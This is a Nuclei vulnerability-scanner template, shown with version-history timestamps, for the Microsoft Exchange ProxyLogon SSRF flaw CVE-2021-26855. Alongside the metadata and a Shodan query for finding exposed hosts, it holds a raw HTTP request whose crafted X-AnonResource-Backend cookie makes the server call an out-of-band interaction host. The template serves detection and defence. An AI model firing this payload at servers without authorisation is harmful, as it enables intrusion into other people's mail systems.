nuclei-templates/http/cves/2021/CVE-2021-26855.yaml

44 lines
2.2 KiB
YAML
Raw Normal View History

2021-03-06 07:00:59 +00:00
id: CVE-2021-26855
info:
name: Microsoft Exchange Server SSRF Vulnerability
2021-03-06 07:00:59 +00:00
author: madrobot
severity: critical
description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.
2023-09-06 12:09:01 +00:00
remediation: Apply the appropriate security update.
reference:
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
- https://proxylogon.com/#timeline
- https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
2023-07-11 19:49:27 +00:00
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-26855
2023-07-11 19:49:27 +00:00
cwe-id: CWE-918
epss-score: 0.97507
epss-percentile: 0.9998
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microsoft
product: exchange_server
2023-09-06 12:09:01 +00:00
shodan-query: vuln:CVE-2021-26855
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev
2021-03-06 07:34:26 +00:00
http:
2021-03-06 07:00:59 +00:00
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
2021-08-12 15:54:09 +00:00
Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
2021-03-06 07:00:59 +00:00
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2021-03-06 07:00:59 +00:00
words:
- "http"
# digest: 4a0a00473045022100baf555918037b9a93b1a7f416af6821f3575e2c077fa83bebbfccd21d0d4feba02206002caaf74e66ea22f23cf6ac9f49252455334e5ea905a9abfdba8fb53819042:922c64590222798bb761d5b6d8e72950